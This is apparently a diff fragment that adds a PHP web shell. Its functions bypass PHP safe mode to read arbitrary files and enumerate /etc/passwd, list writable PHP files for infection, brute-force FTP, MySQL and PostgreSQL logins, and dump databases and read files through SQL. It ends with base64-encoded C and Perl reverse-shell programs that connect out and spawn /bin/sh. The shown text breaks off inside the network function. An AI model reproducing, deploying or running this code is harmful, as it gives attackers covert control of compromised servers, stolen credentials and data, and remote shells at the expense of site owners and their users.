+ | if(substr($path, -1) != '/') | ||
+ | $path.='/'; | ||
+ | $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); | ||
+ | if(is_array($paths)&&@count($paths)) { | ||
+ | foreach($paths as $â) { | ||
+ | if(@is_dir($â)){ | ||
+ | if($path!=$â) | ||
+ | hardRecursiveGlob($â); | ||
+ | } else { | ||
+ | if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) | ||
+ | echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if(@$_POST['p3']) | ||
+ | hardRecursiveGlob($_POST['c']); | ||
+ | echo "</div><br><h1>Search for hash:</h1><div class=content> | ||
+ | <form method='post' target='_blank' name='hf'> | ||
+ | <input type='text' name='hash' style='width:200px;'><br> | ||
+ | <input type='hidden' name='act' value='find'/> | ||
+ | <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> | ||
+ | <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> | ||
+ | <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> | ||
+ | <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> | ||
+ | <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> | ||
+ | </form></div>"; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionSafeMode() { | ||
+ | $temp=''; | ||
+ | ob_start(); | ||
+ | switch($_POST['p1']) { | ||
+ | case 1: | ||
+ | $temp=@tempnam($test, 'cx'); | ||
+ | if(@copy("compress.zlib://".$_POST['p2'], $temp)){ | ||
+ | echo @file_get_contents($temp); | ||
+ | unlink($temp); | ||
+ | } else | ||
+ | echo 'Sorry... Can\'t open file'; | ||
+ | break; | ||
+ | case 2: | ||
+ | $files = glob($_POST['p2'].'*'); | ||
+ | if( is_array($files) ) | ||
+ | foreach ($files as $filename) | ||
+ | echo $filename."\n"; | ||
+ | break; | ||
+ | case 3: | ||
+ | $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); | ||
+ | curl_exec($ch); | ||
+ | break; | ||
+ | case 4: | ||
+ | ini_restore("safe_mode"); | ||
+ | ini_restore("open_basedir"); | ||
+ | include($_POST['p2']); | ||
+ | break; | ||
+ | case 5: | ||
+ | for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { | ||
+ | $uid = @posix_getpwuid($_POST['p2']); | ||
+ | if ($uid) | ||
+ | echo join(':',$uid)."\n"; | ||
+ | } | ||
+ | break; | ||
+ | case 6: | ||
+ | if(!function_exists('imap_open'))break; | ||
+ | $stream = imap_open($_POST['p2'], "", ""); | ||
+ | if ($stream == FALSE) | ||
+ | break; | ||
+ | echo imap_body($stream, 1); | ||
+ | imap_close($stream); | ||
+ | break; | ||
+ | } | ||
+ | $temp = ob_get_clean(); | ||
+ | hardHeader(); | ||
+ | echo '<h1>Safe mode bypass</h1><div class=content>'; | ||
+ | echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; | ||
+ | if($temp) | ||
+ | echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionLogout() { | ||
+ | setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); | ||
+ | die('bye!'); | ||
+ | } | ||
+ | function actionSelfRemove() { | ||
+ | if($_POST['p1'] == 'yes') | ||
+ | if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) | ||
+ | die('Shell has been removed'); | ||
+ | else | ||
+ | echo 'unlink error!'; | ||
+ | if($_POST['p1'] != 'yes') | ||
+ | hardHeader(); | ||
+ | echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionInfect() { | ||
+ | hardHeader(); | ||
+ | echo '<h1>Infect</h1><div class=content>'; | ||
+ | if($_POST['p1'] == 'infect') { | ||
+ | $target=$_SERVER['DOCUMENT_ROOT']; | ||
+ | function ListFiles($dir) { | ||
+ | if($dh = opendir($dir)) { | ||
+ | $files = Array(); | ||
+ | $inner_files = Array(); | ||
+ | while($file = readdir($dh)) { | ||
+ | if($file != "." && $file != "..") { | ||
+ | if(is_dir($dir . "/" . $file)) { | ||
+ | $inner_files = ListFiles($dir . "/" . $file); | ||
+ | if(is_array($inner_files)) $files = array_merge($files, $inner_files); | ||
+ | } else { | ||
+ | array_push($files, $dir . "/" . $file); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | closedir($dh); | ||
+ | return $files; | ||
+ | } | ||
+ | } | ||
+ | foreach (ListFiles($target) as $key=>$file){ | ||
+ | $nFile = substr($file, -4, 4); | ||
+ | if($nFile == ".php" ){ | ||
+ | if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ | ||
+ | echo "$file<br>"; | ||
+ | $i++; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | echo "<font color=red size=14>$i</font>"; | ||
+ | }else{ | ||
+ | echo "<form method=post><input type=submit value=Infect name=infet></form>"; | ||
+ | echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; | ||
+ | } | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionBruteforce() { | ||
+ | hardHeader(); | ||
+ | if( isset($_POST['proto']) ) { | ||
+ | echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; | ||
+ | if( $_POST['proto'] == 'ftp' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $fp = @ftp_connect($ip, $port?$port:21); | ||
+ | if(!$fp) return false; | ||
+ | $res = @ftp_login($fp, $login, $pass); | ||
+ | @ftp_close($fp); | ||
+ | return $res; | ||
+ | } | ||
+ | } elseif( $_POST['proto'] == 'mysql' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); | ||
+ | @mysql_close($res); | ||
+ | return $res; | ||
+ | } | ||
+ | } elseif( $_POST['proto'] == 'pgsql' ) { | ||
+ | function bruteForce($ip,$port,$login,$pass) { | ||
+ | $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; | ||
+ | $res = @pg_connect($str); | ||
+ | @pg_close($res); | ||
+ | return $res; | ||
+ | } | ||
+ | } | ||
+ | $success = 0; | ||
+ | $attempts = 0; | ||
+ | $server = explode(":", $_POST['server']); | ||
+ | if($_POST['type'] == 1) { | ||
+ | $temp = @file('/etc/passwd'); | ||
+ | if( is_array($temp) ) | ||
+ | foreach($temp as $line) { | ||
+ | $line = explode(":", $line); | ||
+ | ++$attempts; | ||
+ | if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; | ||
+ | } | ||
+ | if(@$_POST['reverse']) { | ||
+ | $tmp = ""; | ||
+ | for($i=strlen($line[0])-1; $i>=0; --$i) | ||
+ | $tmp .= $line[0][$i]; | ||
+ | ++$attempts; | ||
+ | if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } elseif($_POST['type'] == 2) { | ||
+ | $temp = @file($_POST['dict']); | ||
+ | if( is_array($temp) ) | ||
+ | foreach($temp as $line) { | ||
+ | $line = trim($line); | ||
+ | ++$attempts; | ||
+ | if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { | ||
+ | $success++; | ||
+ | echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; | ||
+ | } | ||
+ | echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' | ||
+ | .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' | ||
+ | .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' | ||
+ | .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' | ||
+ | .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' | ||
+ | .'<input type=hidden name=ne value="">' | ||
+ | .'<span>Server:port</span></td>' | ||
+ | .'<td><input type=text name=server value="127.0.0.1"></td></tr>' | ||
+ | .'<tr><td><span>Brute type</span></td>' | ||
+ | .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' | ||
+ | .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' | ||
+ | .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' | ||
+ | .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' | ||
+ | .'<td><input type=text name=login value="root"></td></tr>' | ||
+ | .'<tr><td><span>Dictionary</span></td>' | ||
+ | .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' | ||
+ | .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; | ||
+ | echo '</div><br>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionSql() { | ||
+ | class DbClass { | ||
+ | var $type; | ||
+ | var $link; | ||
+ | var $res; | ||
+ | function DbClass($type) { | ||
+ | $this->type = $type; | ||
+ | } | ||
+ | function connect($host, $user, $pass, $dbname){ | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $host = explode(':', $host); | ||
+ | if(!$host[1]) $host[1]=5432; | ||
+ | if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function selectdb($db) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if (@mysql_select_db($db))return true; | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function query($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->res = @mysql_query($str); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = @pg_query($this->link,$str); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function fetch() { | ||
+ | $res = func_num_args()?func_get_arg(0):$this->res; | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return @mysql_fetch_assoc($res); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_fetch_assoc($res); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function listDbs() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->query("SHOW databases"); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function listTables() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->res = $this->query('SHOW TABLES'); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function error() { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return @mysql_error(); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_last_error(); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function setCharset($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | if(function_exists('mysql_set_charset')) | ||
+ | return @mysql_set_charset($str, $this->link); | ||
+ | else | ||
+ | $this->query('SET CHARSET '.$str); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | return @pg_set_client_encoding($this->link, $str); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function loadFile($str) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); | ||
+ | $r=array(); | ||
+ | while($i=$this->fetch()) | ||
+ | $r[] = $i['file']; | ||
+ | $this->query('drop table hard2'); | ||
+ | return array('file'=>implode("\n",$r)); | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | function dump($table, $fp = false) { | ||
+ | switch($this->type) { | ||
+ | case 'mysql': | ||
+ | $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); | ||
+ | $create = mysql_fetch_array($res); | ||
+ | $sql = $create[1].";\n"; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | $this->query('SELECT * FROM `'.$table.'`'); | ||
+ | $i = 0; | ||
+ | $head = true; | ||
+ | while($â = $this->fetch()) { | ||
+ | $sql = ''; | ||
+ | if($i % 1000 == 0) { | ||
+ | $head = true; | ||
+ | $sql = ";\n\n"; | ||
+ | } | ||
+ | $columns = array(); | ||
+ | foreach($â as $k=>$v) { | ||
+ | if($v === null) | ||
+ | $â[$k] = "NULL"; | ||
+ | elseif(is_int($v)) | ||
+ | $â[$k] = $v; | ||
+ | else | ||
+ | $â[$k] = "'".@mysql_real_escape_string($v)."'"; | ||
+ | $columns[] = "`".$k."`"; | ||
+ | } | ||
+ | if($head) { | ||
+ | $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; | ||
+ | $head = false; | ||
+ | } else | ||
+ | $sql .= "\n\t,(".implode(", ", $â).')'; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | $i++; | ||
+ | } | ||
+ | if(!$head) | ||
+ | if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); | ||
+ | break; | ||
+ | case 'pgsql': | ||
+ | $this->query('SELECT * FROM '.$table); | ||
+ | while($â = $this->fetch()) { | ||
+ | $columns = array(); | ||
+ | foreach($â as $k=>$v) { | ||
+ | $â[$k] = "'".addslashes($v)."'"; | ||
+ | $columns[] = $k; | ||
+ | } | ||
+ | $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; | ||
+ | if($fp) fwrite($fp, $sql); else echo($sql); | ||
+ | } | ||
+ | break; | ||
+ | } | ||
+ | return false; | ||
+ | } | ||
+ | }; | ||
+ | $db = new DbClass($_POST['type']); | ||
+ | if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { | ||
+ | $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); | ||
+ | $db->selectdb($_POST['sql_base']); | ||
+ | switch($_POST['charset']) { | ||
+ | case "Windows-1251": $db->setCharset('cp1251'); break; | ||
+ | case "UTF-8": $db->setCharset('utf8'); break; | ||
+ | case "KOI8-R": $db->setCharset('koi8r'); break; | ||
+ | case "KOI8-U": $db->setCharset('koi8u'); break; | ||
+ | case "cp866": $db->setCharset('cp866'); break; | ||
+ | } | ||
+ | if(empty($_POST['file'])) { | ||
+ | ob_start("ob_gzhandler", 4096); | ||
+ | header("Content-Disposition: attachment; filename=dump.sql"); | ||
+ | header("Content-Type: text/plain"); | ||
+ | foreach($_POST['tbl'] as $v) | ||
+ | $db->dump($v); | ||
+ | exit; | ||
+ | } elseif($fp = @fopen($_POST['file'], 'w')) { | ||
+ | foreach($_POST['tbl'] as $v) | ||
+ | $db->dump($v, $fp); | ||
+ | fclose($fp); | ||
+ | unset($_POST['p2']); | ||
+ | } else | ||
+ | die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo " | ||
+ | <h1>Sql browser</h1><div class=content> | ||
+ | <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> | ||
+ | <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> | ||
+ | <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> | ||
+ | <td><select name='type'><option value='mysql' "; | ||
+ | if(@$_POST['type']=='mysql')echo 'selected'; | ||
+ | echo ">MySql</option><option value='pgsql' "; | ||
+ | if(@$_POST['type']=='pgsql')echo 'selected'; | ||
+ | echo ">PostgreSql</option></select></td> | ||
+ | <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> | ||
+ | <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> | ||
+ | <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; | ||
+ | $tmp = "<input type=text name=sql_base value=''>"; | ||
+ | if(isset($_POST['sql_host'])){ | ||
+ | if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { | ||
+ | switch($_POST['charset']) { | ||
+ | case "Windows-1251": $db->setCharset('cp1251'); break; | ||
+ | case "UTF-8": $db->setCharset('utf8'); break; | ||
+ | case "KOI8-R": $db->setCharset('koi8r'); break; | ||
+ | case "KOI8-U": $db->setCharset('koi8u'); break; | ||
+ | case "cp866": $db->setCharset('cp866'); break; | ||
+ | } | ||
+ | $db->listDbs(); | ||
+ | echo "<select name=sql_base><option value=''></option>"; | ||
+ | while($â = $db->fetch()) { | ||
+ | list($key, $value) = each($â); | ||
+ | echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; | ||
+ | } | ||
+ | echo '</select>'; | ||
+ | } | ||
+ | else echo $tmp; | ||
+ | }else | ||
+ | echo $tmp; | ||
+ | echo "</td> | ||
+ | <td><input type=submit value='>>' onclick='fs(d.sf);'></td> | ||
+ | <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> | ||
+ | </tr> | ||
+ | </table> | ||
+ | <script> | ||
+ | s_db='".@addslashes($_POST['sql_base'])."'; | ||
+ | function fs(f) { | ||
+ | if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; | ||
+ | if(f.p1) f.p1.value=''; | ||
+ | if(f.p2) f.p2.value=''; | ||
+ | if(f.p3) f.p3.value=''; | ||
+ | } | ||
+ | } | ||
+ | function st(t,l) { | ||
+ | d.sf.p1.value = 'select'; | ||
+ | d.sf.p2.value = t; | ||
+ | if(l && d.sf.p3) d.sf.p3.value = l; | ||
+ | d.sf.submit(); | ||
+ | } | ||
+ | function is() { | ||
+ | for(i=0;i<d.sf.elements['tbl[]'].length;++i) | ||
+ | d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; | ||
+ | } | ||
+ | </script>"; | ||
+ | if(isset($db) && $db->link){ | ||
+ | echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; | ||
+ | if(!empty($_POST['sql_base'])){ | ||
+ | $db->selectdb($_POST['sql_base']); | ||
+ | echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; | ||
+ | $tbls_res = $db->listTables(); | ||
+ | while($â = $db->fetch($tbls_res)) { | ||
+ | list($key, $value) = each($â); | ||
+ | if(!empty($_POST['sql_count'])) | ||
+ | $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); | ||
+ | $value = htmlspecialchars($value); | ||
+ | echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; | ||
+ | } | ||
+ | echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; | ||
+ | if(@$_POST['p1'] == 'select') { | ||
+ | $_POST['p1'] = 'query'; | ||
+ | $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; | ||
+ | $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); | ||
+ | $num = $db->fetch(); | ||
+ | $pages = ceil($num['n'] / 30); | ||
+ | echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; | ||
+ | echo " of $pages"; | ||
+ | if($_POST['p3'] > 1) | ||
+ | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; | ||
+ | if($_POST['p3'] < $pages) | ||
+ | echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; | ||
+ | $_POST['p3']--; | ||
+ | if($_POST['type']=='pgsql') | ||
+ | $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); | ||
+ | else | ||
+ | $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; | ||
+ | echo "<br><br>"; | ||
+ | } | ||
+ | if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { | ||
+ | $db->query(@$_POST['p2']); | ||
+ | if($db->res !== false) { | ||
+ | $title = false; | ||
+ | echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; | ||
+ | $line = 1; | ||
+ | while($â = $db->fetch()) { | ||
+ | if(!$title) { | ||
+ | echo '<tr>'; | ||
+ | foreach($â as $key => $value) | ||
+ | echo '<th>'.$key.'</th>'; | ||
+ | reset($â); | ||
+ | $title=true; | ||
+ | echo '</tr><tr>'; | ||
+ | $line = 2; | ||
+ | } | ||
+ | echo '<tr class="l'.$line.'">'; | ||
+ | $line = $line==1?2:1; | ||
+ | foreach($â as $key => $value) { | ||
+ | if($value == null) | ||
+ | echo '<td><i>null</i></td>'; | ||
+ | else | ||
+ | echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; | ||
+ | } | ||
+ | echo '</tr>'; | ||
+ | } | ||
+ | echo '</table>'; | ||
+ | } else { | ||
+ | echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; | ||
+ | } | ||
+ | } | ||
+ | echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; | ||
+ | if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) | ||
+ | echo htmlspecialchars($_POST['p2']); | ||
+ | echo "</textarea><br/><input type=submit value='Execute'>"; | ||
+ | echo "</td></tr>"; | ||
+ | } | ||
+ | echo "</table></form><br/>"; | ||
+ | if($_POST['type']=='mysql') { | ||
+ | $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); | ||
+ | if($db->fetch()) | ||
+ | echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; | ||
+ | } | ||
+ | if(@$_POST['p1'] == 'loadfile') { | ||
+ | $file = $db->loadFile($_POST['p2']); | ||
+ | echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; | ||
+ | } | ||
+ | } else { | ||
+ | echo htmlspecialchars($db->error()); | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionNetwork() { | ||
+ | hardHeader(); | ||
+ | $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; | ||
+ | $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; | ||
